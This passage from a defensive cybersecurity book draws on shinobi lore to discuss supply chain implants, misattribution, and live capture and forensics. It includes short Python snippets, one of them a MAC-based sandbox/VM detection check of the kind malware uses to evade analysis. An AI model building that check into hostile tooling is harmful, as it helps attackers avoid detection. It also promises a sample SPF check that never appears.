targeting components that do not break or wear down regularly,

are not easily replaced or upgraded with cheaper versions over

time, are too important to turn off or dispose of, and are dif-

ficult to modify and update (such as firmware, BIOS, UEFI, and

MINIX). Autonomy and stealth requirements for this class of sup-

ply chain implant mean the implant needs to avoid inspection,

scans, and other types of integrity testing while having access to

some form of processor instruction or execution.

2. Implement supply chain protections. Implement supply chain safe-

guards and protections as needed. A ghost on the moon supply

chain attack is one of the most challenging to detect, prevent, or

mitigate. Thus, many organizations simply accept or ignore this

risk. It can be useful to start with first principles—fundamental

truths about security and the purpose of your business—and

then use these truths as a rubric to evaluate the threat your

organization faces. Review “A Contemporary Look at Saltzer and

Schroeder’s 1975 Design Principles”3 or other core security works

to determine appropriate mitigations for this threat. It could

also be helpful to abstract the problems to higher-level concepts,

where they become familiar and understood, and then attempt

to solve them. Consider the following Castle Theory Thought

Exercise.


CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside. You receive credible threat intelligence that a scribe

in your employ is an enemy “ghost on the moon” plant. This agent has spent

the past 10 years learning to copy your handwriting style, vernacular, and

sealing techniques, and they have memorized the names and addresses of

all your important contacts. The plant has the means to modify your outgoing

orders, such as by directing your standing army to travel far from key defense

locations. It is not clear which scribe is the plant or whether the scribe has

already been activated by an enemy shinobi. Scribes are a scarce resource

in your kingdom—acquiring and training them is costly and time intensive—

and they are critical to your operations.

How do you detect which scribe is an enemy plant, both pre- and post-

activation? Consider what safeguards could prevent the scribe from sending

altered orders in your name . What authentication protocols could you imple-

ment to prevent message spoofing? What integrity measures might you take

to prevent message tampering? What nonrepudiation controls would deny

false messages sent in your name? How could you ensure that future scribes

are not compromised enemy plants? Finally, consider all these questions in a

scenario in which multiple scribes are enemy plants.
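The scribe's dilemma maps neatly onto message authentication. As one hedged illustration, the Python sketch below seals each order with a key the scribes never hold, so a compromised scribe can transcribe but cannot forge. An HMAC gives authentication and integrity; true nonrepudiation would require an asymmetric signature scheme such as Ed25519. The key and orders are invented for the example.

import hashlib
import hmac

RULER_KEY = b"only-the-ruler-holds-this"  # hypothetical secret

def seal(order: bytes) -> bytes:
    """The ruler seals an order with a key no scribe possesses."""
    return hmac.new(RULER_KEY, order, hashlib.sha256).digest()

def verify(order: bytes, tag: bytes) -> bool:
    """A field commander checks the seal before obeying."""
    return hmac.compare_digest(seal(order), tag)

order = b"Hold the army at the western pass."
tag = seal(order)

print(verify(order, tag))                                  # True
print(verify(b"March the army away from the pass.", tag))  # False: altered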

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of ghost on the moon in mind.

1. Consider introducing heterogeneity into the supply chain by

isolating, segmenting, and layering a diverse set of supply chain

components. Supply chain diversity greatly reduces the potential

impact of a compromised component. [SC-29: Heterogeneity]

2. Analyze your organization’s procurement process to identify

areas in which you can reduce the risk of a supply chain attack.

Use techniques such as blind buying, trusted shipping, restrict-

ing purchases from certain companies or countries, amending

purchasing contract language, and randomizing or minimiz-

ing acquisition time. [SA-12: Supply Chain Protection | (1)

Acquisition Strategies/Tools/Methods]

3. Consider delaying non-security updates or acquisition of new,

untested software, hardware, and services for as long as possible.


Implement advanced countermeasures to limit a sophisticated


actor’s opportunity to target your organization. [SA-12: Supply

Chain Protection | (5) Limitation of Harm]

4. Purchase or assess multiple instances of the same hardware,

software, component, or service through different vendors to

identify alterations or non-genuine elements. [SA-12: Supply

Chain Protection | (10) Validate as Genuine and Not Altered;

SA-19: Component Authenticity; SI-7: Software, Firmware, and

Information Integrity | (12) Integrity Verification]

5. Install independent, out-of-band monitoring mechanisms and

sanity tests to verify that high-trust components suspected of sup-

ply chain attack are not performing covert communications or

altering data streams. [SI-4: Information System Monitoring | (11)

Analyze Communications Traffic Anomalies | (17) Integrated

Situational Awareness | (18) Analyze Traffic/Covert Exfiltration]
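Item 5 can be approximated with a simple baseline comparison. In the illustrative Python sketch below, flow records collected at an out-of-band tap are checked against the set of peers a high-trust device is expected to contact; the addresses and baseline are hypothetical.

# Compare a high-trust device's observed peers against an expected
# baseline gathered out of band. Anything new deserves investigation.

EXPECTED_PEERS = {"10.0.0.1", "10.0.0.2", "172.16.0.10"}

def unexpected_peers(flow_records):
    """flow_records: iterable of (src_ip, dst_ip) seen at the tap."""
    observed = {dst for _, dst in flow_records}
    return observed - EXPECTED_PEERS

flows = [
    ("10.0.0.254", "10.0.0.1"),
    ("10.0.0.254", "203.0.113.77"),  # not in the baseline
]
print(unexpected_peers(flows))  # {'203.0.113.77'}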

Debrief

In this chapter, we reviewed the shinobi technique of hiring trusted allies

to work inside an organization and position themselves to be as useful

to the shinobi as possible. We compared this type of plant to hardware

implants and discussed the theory behind what devices and systems

would be suitable for hardware implants. We talked about supply chain

attacks, along with ways to potentially detect them. The thought exercise

challenged you to detect a compromised scribe who has privileged access

to communications; the scribe represents a router, VPN, or other layer 3

device meant to be transparent to the communicators, highlighting how

difficult it can be to determine when such a device is compromised.

In the next chapter, we will discuss the shinobi’s backup plan if you

do happen to catch them or their plant. The shinobi would often plant

false evidence ahead of time, long before their covert mission, enabling

them to shift blame if caught. When successful, this tactic tricks the vic-

tim into believing an ally betrayed them, and this deception itself harms

the target.

15

THE ART OF THE FIREFLIES

The art of fireflies should be performed only after you know

everything about the enemy in great detail so that you can construct

your deception in accordance with the target’s mindset.

Before you carry out surveillance or a covert shinobi activity,

you should leave a note for your future reputation.

—Yoshimori Hyakushu #54

The Bansenshūkai describes an open-disguise infiltration

technique for shinobi called “the art of fireflies” (hotarubi

no jutsu).1 I like to think that this technique was named

based on how the flash of light from a firefly lingers in your

night vision after the fly has moved, causing you to grasp at

empty space. Shōninki describes the same technique as “the

art of camouflage” (koto wo magirakasu no narai).2 Using this

technique, shinobi plant physical evidence that baits an enemy into taking

some desired action, including misattributing whom the shinobi works for,

making false assumptions about the shinobi’s motives, and reacting rashly

to the attempted attack, exposing themselves to further offensive actions.


A forged letter with incriminating details or misleading evidence

about the enemy was the most common hotarubi no jutsu technique, with

several variations. The scrolls describe shinobi sewing a letter into their

collar so that it would be found quickly if they were caught or searched.3

Or, a shinobi might recruit a willing but inept person to be a “ninja,” give

them a letter detailing the exact opposite of the shinobi’s true plans,

and send them on a mission into the adversary’s environment, knowing

that this “doomed agent” would certainly be captured. Importantly, the

recruit themselves would not be aware of this part of the plan. Upon

searching the recruit, guards would find the forged letter, which impli-

cated a high-value target—such as the adversary’s most capable com-

mander—in a treasonous plot. The “ninja” would likely break under

torture and attest to the authenticity of the message, further damning the

target.4 This all served to deceive the enemy into attacking or disposing

of their own allies.

In an even more elaborate variation, prior to the mission, the shinobi

would carefully plant evidence that supported the letter’s false story and

place the forged letter in an incriminating location, such as the quar-

ters of the enemy commander’s trusted adviser. The forged letter then

became a safeguard. If the shinobi were caught, they would withstand tor-

ture until they could determine the enemy’s objectives, and then reveal

their secret knowledge of the letter. The enemy would then find the

letter and the connected evidence. Having built credibility, the shinobi

would then pledge to become a double agent or share secrets about their

employer in exchange for not being executed.5 This technique left the

enemy confused about the shinobi’s motives, concerned about potential

betrayal, and in doubt about who the real adversary was.

In this chapter, we will review the challenges associated with attribut-

ing threats to a specific adversary and/or source. We’ll cover attribution

investigations using threat analytics, observable evidence, and behavior-

based intelligence assessments. We’ll also discuss the problem of sophis-

ticated adversaries who are aware of these attribution methods and thus

take countermeasures. The more emphasis a defender places on attribu-

tion, the more difficult and risky cyber threat actors can make pursuing

leads, so we’ll also discuss ways to address this increased risk.

Attribution

Attribution, in a cybersecurity context, refers to an assessment of observ-

able evidence that can be used to identify actors in cyberspace. The evi-

dence can take many forms. A threat actor’s behavior, tools, techniques,


tactics, procedures, capabilities, motives, opportunities, and intent,

among other information, all provide valuable context and drive

responses to security events.

For example, suppose your home alarm went off, indicating a window

had been broken. Your response would vary drastically based on your

level of attribution knowledge: a firefighter entering your home to extin-

guish a blaze would evoke a different response than a robber breaking in

to steal your belongings, or an errant golf ball crashing through the win-

dow. Of course, attribution isn’t always simple to attain. A thief can exer-

cise some control over observable evidence by wearing gloves and a mask.

They could even wear a firefighter outfit to disguise their identity and

deceive homeowners into acquiescing to their entry. A thief could plant,

destroy, or avoid creating evidence of the crime during or after the act,

impeding the subsequent work of forensic investigators. A truly sophisti-

cated criminal might even frame another criminal using spoofed finger-

print pads; stolen hair, blood, or clothing samples; a realistic 3D-printed

mask; or a weapon acquired from the unsuspecting patsy. If the framed

individual has no alibi, or the crime is committed against a target consis-

tent with their motivations, then authorities would have every reason to

suspect or arrest the patsy.

Cybersecurity professionals face these types of attribution problems, and then some. Attribution is particularly difficult due to the

inherent anonymity of the cyber environment. Even after executing

the difficult task of tracking an attack or event to a source computer

and physical address, cybersecurity professionals can find it exceedingly hard to verify the identity of the human attacker. Attempts

to trace the threat actor’s origin on the compromised machine often

lead to tunnels, VPNs, encryption, and rented infrastructure with no

meaningful logs or evidence. Sophisticated threat actors may even

compromise and remotely connect to foreign machines, using them as

platforms to launch attacks against other systems. Even after detecting

the adversary, it may be advisable in certain cases to not immediately block them or remove their access; instead, it may be beneficial to

monitor them for a while to determine their goals and identifying

characteristics.6

In some cases, threat groups deliberately leave behind tools or

other observables to push an attribution narrative. The United States,

Russia, and North Korea have reportedly altered or copied code seg-

ments, strings, infrastructure, and artifacts in their cybertools to cause

misattribution.7 When cybersecurity professionals discover and reverse

engineer particularly stealthy malware, they occasionally observe unique,


superfluous strings in the malware traces. Perhaps these strings were

overlooked—a tradecraft error by the operator or developer. But they

could also be “the art of fireflies”—evidence designed to be discovered

and used for (mis)attribution.
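To make this concrete, analysts often triage a suspicious binary by pulling out its printable strings before committing to full reverse engineering. The following is a minimal sketch in Python (the six-character minimum and command line usage are illustrative, not from any particular toolkit) of the kind of extraction that surfaces these artifacts:

import re
import sys

def extract_strings(path, min_len=6):
    # Return printable ASCII runs of at least min_len bytes, mimicking
    # the classic "strings" triage step used when hunting for planted,
    # firefly-style artifacts.
    with open(path, "rb") as f:
        data = f.read()
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [s.decode("ascii") for s in re.findall(pattern, data)]

if __name__ == "__main__":
    for s in extract_strings(sys.argv[1]):
        print(s)

Any string recovered this way (a developer handle, a language artifact, a build path) should be treated as a claim to be tested, not as attribution evidence in itself.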

Note that the same mechanisms that make deception possible also

provide powerful means of identification. Memory dumps, disk images,

registries, caches, network captures, logs, net flows, file analyses, strings,

metadata, and more help identify cyber threat actors. Various intelli-

gence disciplines, such as signal intelligence (SIGINT), cyber intelligence

(CYBINT), and open source intelligence (OSINT), also contribute to

attribution, while human intelligence (HUMINT) capabilities collect

data from specific sources that, once processed and analyzed, help indicate who may have conducted cyberattacks. These capabilities are typi-

cally kept secret, as disclosing their existence would inform targets how

to avoid, deny, or deceive these systems, stunting the ability to generate

useful intelligence and threat attribution.

Approaches to Handling Attribution

It is reasonable for organizations to want to know the identity and ori-

gin of threat actors who compromise their systems and networks. It’s

understandable that many want to take action, such as hacking back, to

discover who these threat actors are. However, threat actors, like the shi-

nobi, will always find ways to conduct covert malicious actions through

denial and deception, making attribution uncertain. Furthermore, to

take a lesson from history, the need to conduct shinobi attribution only

ceased once Japan was unified under peaceful rule and shinobi were

no more. The world is unlikely to experience unity in the foreseeable

future, so nation-state cyberattacks are likely to continue. Until world

peace happens, the following approaches to attribution can help you

identify what, if anything, you can do about ongoing cyber conflict:

1. Shed your cognitive biases. Reflect on your own cognitive biases and

flawed logic. Everybody has holes in their thinking, but we can be

mindful of them and work to correct them. Construct your own

case studies. Review prior judgments that turned out to be incor-

rect, identify the mistakes made, and consider how to improve

your analytical ability. This important work can be done in small

steps (logic puzzles, crosswords, and brainteasers are a great way

to improve cognitive function) or big strides. You can study arti-

cles and books on psychology that discuss known cognitive biases


and logical fallacies and learn structured analytical techniques to

overcome your own.8

2. Build attribution capabilities. Examine what data sources, systems,

knowledge, and controls you can use to influence attribution at

your organization. Are you running open, unprotected Wi-Fi that

allows unregistered, unauthenticated, and unidentified threat

actors to anonymously connect to your network and launch

attacks? Are you managing routers that allow spoofed IPs, or do they use reverse-path forwarding (RPF) protection technologies to prevent anonymized attacks from within your network? Are you correctly publishing a Sender Policy Framework (SPF) record to prevent threat actors from spoofing email addresses and assuming your organization's identity? (A sample SPF check appears after this list.)

While many of these configuration changes incur no direct

costs, the time and labor (and opportunity costs) to implement

such wide-reaching changes can give management pause. However,

consider whether a prior decision to invest in good cameras and

lighting helps a storekeeper correctly identify a vandal. Establishing

sound logging, documentation, and evidence collection practices

improves attribution capabilities, enforces greater technological

accountability, and provides end users with better visibility into

network threats.

3. . . . Or forget about attribution. Work with your organization’s stake-

holders to determine the scope of attribution efforts necessary

to mitigate risk. For organizations with the ability to arrest threat

actors or launch counteroffensive attacks, attribution is a neces-

sity. However, most organizations cannot or should not attempt to

catch or attack threat actors, learn their identities, or map their

capabilities. In reality, attribution to a specific threat actor is not

always necessary. Awareness of the threat can be enough to ana-

lyze and defend against it.

For example, suppose two threat actors target your organiza-

tion’s intellectual property. One wants to sell the information on

the black market to make money, and the other wants the infor-

mation to help build weapons systems for their country. It actu-

ally doesn’t matter. Regardless of the threat actors’ purpose and

an organization’s capability to track them down, defenders must

ultimately restrict or deny opportunities to exploit their security

flaws. The organization does not necessarily need to assess a

threat actor’s motivation to avoid the threat.


CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside. Your guards capture a stranger in the act of digging a tunnel under one of your castle walls. After intense interrogation, the stranger claims they were paid to dig a tunnel to the castle's food storage so bandits could steal the supplies. However, your guards search the prisoner and discover a note with instructions on how to communicate with one of your trusted advisers. The note indicates that this adviser has a plan to spur rebellion against your rule by depriving your villagers of food. The message appears authentic. Your guards cannot identify the intruder or whom they are working for.

Consider how you would conduct attribution to determine who the

intruder is, where they’re from, what their motivation might be, and whom

they might be working for. How could you test the stranger’s assertion that

their ultimate aim is to steal food—as opposed to, say, destroy the food, pro-

vide an infiltration route for a different threat actor, attack castle inhabitants,

or even start a rebellion? How could you confirm your adviser’s role in enemy

schemes? What actions would you take if you did find further evidence for

the intruder’s attribution scenario? And what would you do if you couldn’t

prove it?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of attribution in mind.

1. Map accounts to user identities. Verify the identity of the indi-

vidual associated with the user account via biometrics, identifi-

cation, logical or physical evidence, or access controls. [SA-12:

Supply Chain Protection | (14) Identity and Traceability]

2. Develop a plan that defines how your organization handles attri-

bution assessments of threat agents. [IR-8: Incident Response Plan]

3. Establish threat awareness programs that collect and share infor-

mation on the characteristics of threat actors, how to identify

them in your environment, evidence of attribution, and other

observables. Use specific collection capabilities such as honeypots


for attribution purposes. [PM-16: Threat Awareness Program; SC-26: Honeypots]

4. Apply security and collection controls. Perform threat modeling

to identify threat agents. [SA-8: Security and Privacy Engineering

Principles]

Debrief

In this chapter, we reviewed the art of the fireflies—a misattribution tech-

nique used by the shinobi. Cyber threat groups are continually evolving

in sophistication, and they are likely to incorporate this technique into

their operations security procedures, if they haven’t already. We noted

that several threat groups are believed to be using misattribution tech-

niques already, discussed approaches to handling attribution, and explained why the outlook for reliable attribution is bleak.

In the next chapter, we will discuss shinobi tactics for maintaining

plausible deniability when defenders interrogated them. The chapter will

also discuss advanced shinobi interrogation techniques and tools used

when capturing enemy shinobi.

16

L I V E C A P T U R E

Use good judgment to determine whether the target

is actually inattentive or whether they are employing

a ruse to lure ninjas and capture them.

If you find a suspicious individual while you are on night

patrol, you should capture him alive by calling on all your

resources.

—Yoshimori Hyakushu #74

Though shinobi encountered deadly violence as an

everyday part of the job, Bansenshūkai recommends that

enemies, especially suspected ninjas, be captured alive

rather than immediately killed. Searching and interrogat-

ing a captured ninja allows shinobi to discover what the

attacker has done or is planning to do, determine who

the intruder’s employer is, and learn valuable secrets and

tradecraft, all of which could greatly help guards defend

against ninja attacks and help lords to understand strategic threats. In

addition, the captured enemy might turn out to be a comrade in disguise,

a fact that would not be clear until deep interrogation.1 The Ninpiden


calls for the suspected ninja to be bound hand and foot and placed on a

leash. The Ninpiden also recommends using tools, such as a spiked gag,

to prevent the captive from talking, as a skillful ninja could alert allies,

persuade their captor to release them, or even bite off their own tongue

to commit suicide.2

The scrolls acknowledge that capturing an enemy ninja alive is no

easy task. One of Bansenshūkai’s more direct techniques involves loading

a musket with a chili powder–infused cotton ball—a sort of ancient tear

gas or pepper spray. When fired at close range, this projectile would create

debilitating irritation in the target’s eyes and nose, rendering them more

susceptible to capture. The scrolls also describe more oblique tactics, such

as fushi-kamari ambushes and traps. For example, the tiger fall trap (mogari

or koraku) described in Bansenshūkai Gunyo-hiki was originally designed

to capture tigers (as the name suggests) but was later modified to capture

ninjas. In it, barriers funnel an intruder through a maze of hidden traps.

While allies would know a trusted path, a ninja infiltrating alone at night

would not, making it likely they would fall into the trap. Other trap meth-

ods used tsuiritei, or “fake suspended wall sections,” which are veneers that

look like real walls but are built with wedges and false posts. When a ninja

would attempt to scale these fake walls, the walls would collapse, surpris-

ing and likely injuring the ninja and thus permitting their easy capture.3

Bansenshūkai also suggests defensive measures to guard against cap-

ture, suggesting ways to detect and avoid fushi-kamari ambushes. Shinobi

were advised to scout forests, fields, valleys, trenches, and other settings

for unnatural behavior from birds, other animals, and even the grass, all

of which could indicate a trap. Dummies and unusual smells also tip the

hand of a potential ambush.4 In enemy territory, shinobi could deploy a

number of evasive tactics, including:

Quail hiding (uzura-gakure) A shinobi would curl into a ball on the

ground and concentrate on being blind, unaware, and unresponsive

so the enemy would be unlikely to find them. Even when prodded by

a guard with a spear or sword, they would not react.

Raccoon dog retreat (tanuki-noki) While fleeing on foot, a shinobi

would decide to be “caught” by a faster pursuer. When the gap between

them narrowed, the shinobi would drop to the ground without warn-

ing and aim their sword at the pursuer’s waist, impaling the pursuer

before they could react.

Retreat by 100 firecrackers (hyakurai-ju) A shinobi would place

firecrackers near the target, either setting them on a delayed fuse

or arranging for allies to light them. The sound would distract the

enemy pursuers.


Fox hiding (kitsune-gakure) A shinobi would escape by moving

vertically. Instead of trying to flee enemy territory by moving from

point A to point B, the shinobi would climb a tall tree or hide in

a moat, changing the dimensions of the chase. This tactic often

stumped the enemy, who was unlikely to think to look up or down

for the target.5

Other methods of escape included imitation—mimicking a dog or

other animal to deceive pursuers—and false conversation—language

that would mislead the enemy, allowing the shinobi to flee.6 For exam-

ple, a shinobi who knew they were being followed might pretend not to

hear the pursuers and whisper to an imaginary ally so the alert guards

would overhear them. If the shinobi said, “Let’s quietly move to the

lord’s bedroom so we may kill him in his sleep,” the guards would likely

send forces to the lord’s bedroom, allowing the shinobi to escape in

another direction.

Of course, the best way for shinobi to avoid being captured was to

leave behind no evidence that could lead investigators to suspect a breach

in the first place. The scrolls stress the importance of conducting mis-

sions without trace so that the target has no cause to suspect a shinobi on

the premises. Guidance on operating covertly abounds in the scrolls; the

writing is artfully vivid in places. Yoshimori Hyakushu #53 states, “If you

have to steal in as a shinobi when it is snowing, the first thing you must be

careful about is your footsteps.”7

Capturing threats alive is, unfortunately, not always top of mind for

many organizations. When some organizations detect a threat on a sys-

tem, they do the opposite of what is recommended in the shinobi scrolls:

they immediately unplug the machine, wipe all data, reformat the drive,

and install a fresh version of the operating system. While this wipe-and-

forget response eradicates the threat, it also eliminates any opportunity

to capture the threat, let alone investigate it or analyze its goals, what it

has already accomplished, and how.

In this chapter, we will discuss the importance of being able to cap-

ture and interact with cyber threats while they are “alive.” We will review

existing forensics/capture methods, along with ways threat actors may

attempt to evade them. We’ll consider ways to capture cyber threats

“alive” with tiger traps and honey ambushes—techniques inspired by

the ancient shinobi. In addition, we will touch on modern implementa-

tions of shinobi evasion tactics (e.g., quail hiding and fox hiding) that

have been used by persistent threats. Lastly, we’ll cover much of the

capture and interrogation guidance from the shinobi scrolls—guidance

around how to properly control a threat so it cannot alert its allies or

self-destruct.


Live Analysis

In cybersecurity, computer forensic imaging provides necessary threat

intelligence. Forensic images are typically made after a security incident

(such as a malware infection) or a use violation (such as the download

of child pornography onto a device), with imaging done in a way that

preserves evidence without disrupting the integrity of the data on the

system under investigation. Evidence from a forensic image can help

security professionals learn what the threat was and how it exploited

vulnerabilities. Then, in time, it can provide the information necessary

to develop signatures, safeguards, and proactive blocking measures.

For instance, determining that an attacker was after specific intellectual

property on one critical system tells defenders to protect that system’s

data. If forensics determines that the attack succeeded and sensitive data

was compromised, the organization can use that knowledge to deter-

mine its strategic business response. If the threat failed, the organization

can prepare for possible follow-up attacks. Forensic indicators might also

provide an understanding of who was responsible for the threat, fur-

ther dictating the response. An organization’s strategy should take into

account the severity of the threat—for instance, whether the attacker

was a foreign government, a disgruntled employee, or a kid performing

harmless notoriety hacking.

Collecting a device’s data for analysis involves live capture (also known

as live analysis or live acquisition) and imaging (also forensic imaging or mir-

roring). Organizations use honeypots and other deceptive virtual environ-

ments to live capture and even interact with attackers. Such systems are

often configured to lure in hackers or be easily accessible to malware so

that when the threat infiltrates the system, hidden logging and monitor-

ing controls capture exactly what the threat does and how, along with

other observables. Unfortunately, many attackers are aware of these

honeypots and perform tests to determine whether they are inside a

simulated environment meant to collect intelligence. If their suspicions

are confirmed, attackers will behave differently or cease operations,

undermining the security team’s efforts. Network access control (NAC)

devices can also contain live threats by dynamically switching a system

to an infected VLAN, where it remains online and “live” while defenders

respond.
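At its simplest, live acquisition means recording volatile state, such as running processes and network connections, while the system is still powered on. The following is a minimal triage sketch in Python assuming the third-party psutil library; a real forensic agent would capture far more, including full memory images:

import json
import psutil  # third-party: pip install psutil

def live_triage():
    # Snapshot volatile state that a wipe-and-forget response would destroy.
    procs = [p.info for p in psutil.process_iter(["pid", "name", "exe", "cmdline"])]
    conns = [
        {"laddr": str(c.laddr), "raddr": str(c.raddr), "status": c.status, "pid": c.pid}
        for c in psutil.net_connections(kind="inet")
    ]
    return {"processes": procs, "connections": conns}

# Forward the snapshot to storage the threat cannot tamper with.
print(json.dumps(live_triage(), default=str))

Ideally the collector runs from trusted, read-only media, since a live threat that notices it may hide, self-delete, or retaliate, as discussed below.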

Forensics are not typically performed on a live capture. Rather, the

forensic analyst looks at static, inert, or dead data, which may have lost

certain information or the threat’s unique details. This is commonly seen

in fileless malware, which resides in memory, or in specific malicious


configurations or artifacts, such as those in routing table caches. Live

analysis is not conducted more often for a number of reasons, including:

• Specialized technology requirements

• Having to bypass organizational policies that require disconnect-

ing, unplugging, quarantining, or blocking compromised systems

• A lack of capable forensic resources that are physically onsite to

conduct live analysis

• Lack of employee access to vital systems during an investigation

Perhaps most importantly, if live analysis is mishandled, the threat

can become aware of the forensic imaging software on the system and

decide to hide, delete itself, perform antiforensic countermeasures, or

execute destructive attacks against the system.

To bypass forensic capture techniques, threats deploy in multiple stages.

During the initial stage, reconnaissance, the threat looks for the presence of

capturing technology, only loading malware and tools after it validates that

it can operate safely within the environment. Such precautions are neces-

sary for the threat actor. If a successful capture and forensic analysis occurs,

the threat’s tools and techniques can be shared with other organizations

and defenders, allowing them to learn from the attack, patch against it, or

develop countermeasures. Law enforcement may even use forensic capture

tactics to track down or provide evidence against threat actors.
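As an illustration of that reconnaissance stage, one widely reported check is whether the machine's network adapter carries a MAC address prefix registered to a virtualization vendor, a hint that the "victim" may really be an analysis sandbox or honeypot. A minimal sketch in Python follows (the OUI list is abbreviated and illustrative; real threats check many more artifacts):

import uuid

# MAC prefixes (OUIs) publicly registered to common virtualization vendors.
VM_OUIS = {"00:0c:29", "00:50:56", "08:00:27", "00:05:69"}

def looks_virtualized():
    # uuid.getnode() returns the primary interface's 48-bit MAC address.
    mac = uuid.getnode()
    oui = ":".join(f"{(mac >> shift) & 0xff:02x}" for shift in (40, 32, 24))
    return oui in VM_OUIS

print("possible sandbox" if looks_virtualized() else "no obvious VM artifacts")

Defenders can invert the same logic: a capture environment that scrubs these artifacts is much harder for a threat to fingerprint.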

Recently, sophisticated actors have moved laterally into computer and

network areas that standard forensic imaging, capture, and analysis tools

do not or cannot inspect. These actors’ innovations include installing hard

drive firmware that creates a hidden, encoded filesystem; embedding mal-

ware in BIOS storage; leveraging local microchip storage to operate out-

side normal working memory; and changing low-level modules and code

on networking gear such as routers, switches, smart printers, and other

devices not traditionally inspected by or even practical for forensic imag-

ing. Certain threats imitate core OS or trusted security components by

infiltrating the original manufacturer, who is inherently trusted and not

considered for forensic analysis. Others hide by deleting forensic evidence,

moving to the memory of a system that does not reset often—such as a

domain controller—and then waiting for forensic scrutiny on the systems

of interest to subside before returning to the intended target.

Confronting Live Threats

Organizations too often find themselves dealing with an active security

incident when the single person trained to use forensic imaging tools is


out of the office. It sometimes takes days before the quarantined machine

can be shipped to that person for examination, and by then, the attack is

no longer a live representation of the current threat. This inability to oper-

ate at the same speed as the threat, or faster, leaves defenders relegated to

the role of a forensic janitor—the person who collects evidence and cleans

up infections after the threat actor has already achieved their objectives.

Proactively establishing capabilities, traps, and ambushes to confront the

threat is necessary to capture it alive and interrogate it thoroughly.

1. Establish a forensic capability. Commit to and invest in establishing

a dedicated team with the equipment, experience, certification,

and authorization to perform computer forensics. Create forensic

kits with write blockers, secure hard drives, and other specialized

software and devices. Ensure that all systems used for capture and

analysis have appropriate forensic agents so the team can imme-

diately identify, locate, isolate, and perform collection. Ensure

that all employees understand how they can help the forensic

team identify and locate affected systems and preserve evidence.

If it has been more than a month since they conducted a forensic

investigation, run refresher training courses or exercises with the

forensic team. Most importantly, when a forensic report is done,

read it to discover root causes of security incidents and take proac-

tive measures to remediate the vulnerabilities exploited.

2. Conduct honey ambushes. Where appropriate, empower your team

to ambush threat actors rather than simply following their trail or

catching them in a honeypot. Aggressively trapping and ambush-

ing threats requires close partnerships with cloud hosts, ISPs,

registrars, VPN service providers, the Internet Crime Complaint

Center (IC3), financial services, law enforcement organizations,

private security companies, and commercial companies. Support

the goal of creating network territory hostile to threat actors,

where the combined forces of you and your partners can ambush

threat actors, groups, or campaigns to capture evidence, mal-

ware, tools, and exploits themselves.

3. Set tiger traps. Consider creating tiger fall traps in likely targets in

your network, such as a domain controller. A market opportunity

exists for a product that serves as an operational production sys-

tem with honeypot capabilities that trigger if the wrong action is

performed. Because threat actors attempting to bypass security

controls typically pivot from one system to another or move later-

ally across systems and networks, it may be possible to establish

false or booby-trapped jumpboxes that seem like routes to other


networks but in fact trap the threat. Deploy these traps in such a

way that the wrong action causes a system to freeze, lock, or iso-

late the attack, in turn allowing defenders to examine, interact

with, or forensically live capture the threat. Do this by freezing the

CPU clock, causing the hard drive to operate in buffer mode only, or using a hypervisor to trap and log the activity. Provide train-

ing to ensure that system admins and other IT professionals can

remotely traverse a legitimate path without falling into the trap.
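A very small taste of the trap concept is a decoy listener on a port that no legitimate administrative path uses, so any connection to it is by definition suspicious. The sketch below, in Python, logs the touch and then simply holds the session open so responders can engage the live threat (the port and banner are illustrative):

import socket
import time
from datetime import datetime, timezone

TRAP_PORT = 2222  # decoy port; no legitimate path should touch it

def run_trap():
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", TRAP_PORT))
    srv.listen(5)
    while True:
        conn, addr = srv.accept()
        # Log the touch, then tarpit: keep the session open and never
        # authenticate, buying time for live examination.
        print(f"{datetime.now(timezone.utc).isoformat()} trap hit from {addr}")
        conn.sendall(b"SSH-2.0-OpenSSH_8.0\r\n")
        time.sleep(3600)
        conn.close()

run_trap()

In production, the alert would go to the SOC and trigger isolation rather than print to a console; the point is that touching the trap is itself the signal.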

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside. Your guards recently captured an intruder they believed to be a ninja, quickly killed the suspect, and then set the body on fire. The guards say they took these measures to remove any residual risk the ninja posed. When you ask your guards why they thought the intruder was a ninja, what the intruder carried on their person, what this person was doing in the castle, and how a stranger successfully infiltrated your stronghold, the guards do not know. They seem to expect praise for quickly terminating the threat while suffering minimal harm themselves.

How could you establish better protocols, procedures, and tools for your

guards to safely apprehend suspected intruders? How would you have inter-

rogated the ninja—if the intruder was indeed a ninja—had your guards not

killed them? What would you have looked for in the ninja’s possessions had

they not been burned? How do you think the ninja infiltrated your castle, and

how could you confirm those suspicions? How would you search your castle

to determine whether the ninja performed sabotage, placed traps, or sent

a signal before they died? What would you ask the guard who discovered

the ninja, and how could their answers help you train other guards? What

do you expect to learn from this investigation, and what decisions or actions

might you take based on your findings?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of live capture in mind.

1. Restrict the use of external systems and components within your

organization if you do not have the authorization or capability


to perform forensic investigations on them. [AC-20: Use of

External System | (3) Non-Organizationally Owned Systems and

Components]

2. Using external sensors and SIEMs that cannot be easily accessed,

implement automated mechanisms to fully collect live data, PCAPs,

syslog, and other data needed for forensic analysis. [AU-2: Audit

Events; AU-5: Response to Audit Processing Failures | (2) Real-Time

Alerts; IR-4: Incident Handling | (1) Automated Incident Handling

Processes; SA-9: External System Services | (5) Processing, Storage,

and Service Location; SC-7: Boundary Protection | (13) Isolation of

Security Tools, Mechanisms, and Support Components]

3. If you decide to implement non-persistence as a countermeasure

against threats—such as by regularly reimaging or rebuilding

all your systems to destroy any unauthorized access—consider

performing a forensic capture before reimaging or teardown to

preserve evidence of threats. [AU-11: Audit Record Retention |

(1) Long-Term Retrieval Capability; MP-6: Media Sanitization

| (8) Remote Purging or Wiping of Information; SI-14: Non-

Persistence; SI-18: Information Disposal]

4. Implement, document, and enforce baseline system configura-

tions in your organization so forensic analysts can more eas-

ily determine what information could have been altered by a

